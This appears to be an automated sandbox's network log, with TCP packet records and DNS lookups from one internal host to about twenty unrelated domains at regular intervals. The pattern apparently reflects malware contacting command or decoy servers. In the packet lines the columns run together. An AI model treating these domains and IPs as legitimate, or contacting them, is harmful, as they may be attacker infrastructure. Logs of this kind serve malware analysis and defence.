                                                                                                                      Dec 7, 2023 15:53:27.125536919 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.125619888 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.125674009 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.465846062 CET4971980192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.616847038 CET8049719173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.617100954 CET4971980192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.617475033 CET4971980192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.770145893 CET8049719173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:29.804791927 CET8049719173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:29.855840921 CET4971980192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:29.884135962 CET8049719173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:29.884526014 CET8049719173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:29.884656906 CET4971980192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:29.884691000 CET4971980192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:30.035712004 CET8049719173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:35.298654079 CET4972080192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:35.496160984 CET804972069.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:35.496364117 CET4972080192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:35.496639013 CET4972080192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:35.694610119 CET804972069.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:35.790929079 CET804972069.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:35.790994883 CET804972069.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:35.791151047 CET4972080192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:37.013277054 CET4972080192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:38.028444052 CET4972180192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:38.226002932 CET804972169.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:38.226264000 CET4972180192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:38.226535082 CET4972180192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:38.424333096 CET804972169.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:38.520930052 CET804972169.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:38.520962954 CET804972169.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:38.521069050 CET4972180192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:39.731292963 CET4972180192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:40.747081995 CET4972280192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:40.943731070 CET804972269.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:40.943897963 CET4972280192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:40.965720892 CET4972280192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:41.161793947 CET804972269.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:41.255520105 CET804972269.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:41.255548000 CET804972269.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:41.255649090 CET4972280192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:42.481010914 CET4972280192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:43.497193098 CET4972380192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:43.694204092 CET804972369.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:43.694408894 CET4972380192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:43.694645882 CET4972380192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:43.891613960 CET804972369.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:43.992939949 CET804972369.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:43.992961884 CET804972369.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:43.993151903 CET4972380192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:43.993340015 CET4972380192.168.2.1169.57.161.215
                                                                                                                      Dec 7, 2023 15:53:44.190814972 CET804972369.57.161.215192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:49.424527884 CET4972480192.168.2.11194.58.112.174
                                                                                                                      Dec 7, 2023 15:53:49.709281921 CET8049724194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:49.709398031 CET4972480192.168.2.11194.58.112.174
                                                                                                                      Dec 7, 2023 15:53:49.709655046 CET4972480192.168.2.11194.58.112.174
                                                                                                                      Dec 7, 2023 15:53:49.994278908 CET8049724194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:49.994836092 CET8049724194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:49.994918108 CET8049724194.58.112.174192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:47.001255035 CET8049737207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:47.001360893 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:48.340328932 CET4973780192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.356353998 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.511996984 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.512090921 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.512392044 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:49.668204069 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.673922062 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.673966885 CET8049738207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:49.674200058 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:51.028016090 CET4973880192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.043693066 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.199027061 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.199304104 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.199393988 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.354720116 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.361907959 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.362062931 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:52.362193108 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.362454891 CET4973980192.168.2.11207.244.126.150
                                                                                                                      Dec 7, 2023 15:54:52.517570019 CET8049739207.244.126.150192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:57.688442945 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:57.884848118 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:57.885004044 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:57.885279894 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:58.081675053 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081706047 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081760883 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081835985 CET8049740162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:58.081901073 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:58.081958055 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:54:59.387250900 CET4974080192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.403214931 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.598994017 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.599112988 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.599354029 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.794980049 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795011997 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795094013 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795110941 CET8049741162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:00.795161009 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:00.795202971 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:02.105993986 CET4974180192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.122360945 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.321042061 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.321171045 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.322160959 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.518512964 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518553019 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518632889 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518676043 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.518704891 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:03.518788099 CET8049742162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:03.518855095 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:04.824598074 CET4974280192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:05.840894938 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.036732912 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.036912918 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.037158012 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.233189106 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233273029 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233314037 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233405113 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.233479023 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:06.233577967 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.233802080 CET4974380192.168.2.11162.240.81.18
                                                                                                                      Dec 7, 2023 15:55:06.430335045 CET8049743162.240.81.18192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.382556915 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.570930004 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.571084023 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.571609020 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.759969950 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.949938059 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.949965000 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.949996948 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950045109 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950081110 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950125933 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950161934 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950270891 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950310946 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950351000 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950464010 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950504065 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950566053 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950679064 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950716972 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950778008 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950841904 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950881004 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:11.950896025 CET804974468.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.950939894 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:13.074706078 CET4974480192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.090823889 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.279429913 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.279521942 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.279906988 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.468281031 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654086113 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654114008 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654155016 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654264927 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654335022 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654422998 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654469013 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654505014 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654527903 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654586077 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654623032 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654647112 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654653072 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654719114 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654736996 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:14.654772997 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654792070 CET804974568.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:14.654866934 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:15.793428898 CET4974580192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:16.846386909 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.035402060 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.035593987 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.036076069 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.224803925 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.383914948 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.383953094 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.383966923 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384026051 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384067059 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384124041 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384176016 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384222031 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384233952 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384233952 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384233952 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384268999 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384422064 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384490967 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384506941 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384520054 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384530067 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384533882 CET804974668.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:17.384560108 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:17.384579897 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:18.544004917 CET4974680192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.559458971 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.747832060 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:19.748043060 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.748173952 CET4974780192.168.2.1168.178.195.71
                                                                                                                      Dec 7, 2023 15:55:19.936388016 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:20.024919987 CET804974768.178.195.71192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:20.024943113 CET804974768.178.195.71192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Dec 7, 2023 15:55:53.295403004 CET6121553192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:55:53.424830914 CET53612151.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:01.484379053 CET6028853192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:56:01.713165998 CET53602881.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:15.513067007 CET6209953192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:56:16.512427092 CET6209953192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:56:17.407413006 CET53620991.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:17.407438040 CET53620991.1.1.1192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 7, 2023 15:52:46.871187925 CET | 192.168.2.11 | 1.1.1.1 | 0x5709 | Standard query (0) | www.ozzventures.shop | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:02.764329910 CET | 192.168.2.11 | 1.1.1.1 | 0xabcc | Standard query (0) | www.fortunetravelsltd.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:03.762908936 CET | 192.168.2.11 | 1.1.1.1 | 0xabcc | Standard query (0) | www.fortunetravelsltd.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:19.169123888 CET | 192.168.2.11 | 1.1.1.1 | 0x25a2 | Standard query (0) | www.porousworld.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:34.888459921 CET | 192.168.2.11 | 1.1.1.1 | 0xc24f | Standard query (0) | www.greenharbor.info | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:48.997361898 CET | 192.168.2.11 | 1.1.1.1 | 0x632 | Standard query (0) | www.lets-room.online | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:03.435661077 CET | 192.168.2.11 | 1.1.1.1 | 0xb3c7 | Standard query (0) | www.hcfa-cis.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:04.434406042 CET | 192.168.2.11 | 1.1.1.1 | 0xb3c7 | Standard query (0) | www.hcfa-cis.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:12.622395039 CET | 192.168.2.11 | 1.1.1.1 | 0x2abb | Standard query (0) | www.sorenad.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:13.621910095 CET | 192.168.2.11 | 1.1.1.1 | 0x2abb | Standard query (0) | www.sorenad.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:28.562007904 CET | 192.168.2.11 | 1.1.1.1 | 0x372e | Standard query (0) | www.medical-loan24.live | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:42.934729099 CET | 192.168.2.11 | 1.1.1.1 | 0xfaa0 | Standard query (0) | www.speedbikesglobal.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:57.373146057 CET | 192.168.2.11 | 1.1.1.1 | 0x974b | Standard query (0) | www.belaflorloja.online | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:11.248482943 CET | 192.168.2.11 | 1.1.1.1 | 0x7b61 | Standard query (0) | www.blessingstation.org | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:25.028739929 CET | 192.168.2.11 | 1.1.1.1 | 0xc1ce | Standard query (0) | www.cjjmobbbshhhu.shop | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:38.950531960 CET | 192.168.2.11 | 1.1.1.1 | 0x574f | Standard query (0) | www.hillcresthealth.online | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:53.295403004 CET | 192.168.2.11 | 1.1.1.1 | 0x1dd0 | Standard query (0) | www.zbbqis.store | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:56:01.484379053 CET | 192.168.2.11 | 1.1.1.1 | 0xd3de | Standard query (0) | www.hmoatl.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:56:15.513067007 CET | 192.168.2.11 | 1.1.1.1 | 0xda1d | Standard query (0) | www.633922.com | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:56:16.512427092 CET | 192.168.2.11 | 1.1.1.1 | 0xda1d | Standard query (0) | www.633922.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 7, 2023 15:52:47.304883957 CET | 1.1.1.1 | 192.168.2.11 | 0x5709 | No error (0) | www.ozzventures.shop | ozzventures.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:52:47.304883957 CET | 1.1.1.1 | 192.168.2.11 | 0x5709 | No error (0) | ozzventures.shop |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:03.852314949 CET | 1.1.1.1 | 192.168.2.11 | 0xabcc | No error (0) | www.fortunetravelsltd.com | fortunetravelsltd.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:53:03.852314949 CET | 1.1.1.1 | 192.168.2.11 | 0xabcc | No error (0) | fortunetravelsltd.com |  | 103.210.56.141 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:03.888762951 CET | 1.1.1.1 | 192.168.2.11 | 0xabcc | No error (0) | www.fortunetravelsltd.com | fortunetravelsltd.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:53:03.888762951 CET | 1.1.1.1 | 192.168.2.11 | 0xabcc | No error (0) | fortunetravelsltd.com |  | 103.210.56.141 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:19.409032106 CET | 1.1.1.1 | 192.168.2.11 | 0x25a2 | No error (0) | www.porousworld.com | porousworld.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:53:19.409032106 CET | 1.1.1.1 | 192.168.2.11 | 0x25a2 | No error (0) | porousworld.com |  | 173.231.241.132 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:35.297214985 CET | 1.1.1.1 | 192.168.2.11 | 0xc24f | No error (0) | www.greenharbor.info |  | 69.57.161.215 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:53:49.422846079 CET | 1.1.1.1 | 192.168.2.11 | 0x632 | No error (0) | www.lets-room.online |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:04.564275026 CET | 1.1.1.1 | 192.168.2.11 | 0xb3c7 | Server failure (2) | www.hcfa-cis.com | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:04.564301968 CET | 1.1.1.1 | 192.168.2.11 | 0xb3c7 | Server failure (2) | www.hcfa-cis.com | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:13.632445097 CET | 1.1.1.1 | 192.168.2.11 | 0x2abb | No error (0) | www.sorenad.com | sorenad.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:54:13.632445097 CET | 1.1.1.1 | 192.168.2.11 | 0x2abb | No error (0) | sorenad.com |  | 217.144.107.2 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:13.747313023 CET | 1.1.1.1 | 192.168.2.11 | 0x2abb | No error (0) | www.sorenad.com | sorenad.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:54:13.747313023 CET | 1.1.1.1 | 192.168.2.11 | 0x2abb | No error (0) | sorenad.com |  | 217.144.107.2 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:28.851614952 CET | 1.1.1.1 | 192.168.2.11 | 0x372e | No error (0) | www.medical-loan24.live |  | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:43.902667046 CET | 1.1.1.1 | 192.168.2.11 | 0xfaa0 | No error (0) | www.speedbikesglobal.com | speedbikesglobal.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:54:43.902667046 CET | 1.1.1.1 | 192.168.2.11 | 0xfaa0 | No error (0) | speedbikesglobal.com |  | 207.244.126.150 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:54:57.686295986 CET | 1.1.1.1 | 192.168.2.11 | 0x974b | No error (0) | www.belaflorloja.online | belaflorloja.online |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:54:57.686295986 CET | 1.1.1.1 | 192.168.2.11 | 0x974b | No error (0) | belaflorloja.online |  | 162.240.81.18 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:11.381314993 CET | 1.1.1.1 | 192.168.2.11 | 0x7b61 | No error (0) | www.blessingstation.org | blessingstation.org |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:55:11.381314993 CET | 1.1.1.1 | 192.168.2.11 | 0x7b61 | No error (0) | blessingstation.org |  | 68.178.195.71 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:25.476052046 CET | 1.1.1.1 | 192.168.2.11 | 0xc1ce | No error (0) | www.cjjmobbbshhhu.shop | cjjmobbbshhhu.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2023 15:55:25.476052046 CET | 1.1.1.1 | 192.168.2.11 | 0xc1ce | No error (0) | cjjmobbbshhhu.shop |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:39.119580030 CET | 1.1.1.1 | 192.168.2.11 | 0x574f | No error (0) | www.hillcresthealth.online |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Dec 7, 2023 15:55:53.424830914 CET | 1.1.1.1 | 192.168.2.11 | 0x1dd0 | Name error (3) | www.zbbqis.store | none | none | A (IP address) | IN (0x0001) | false
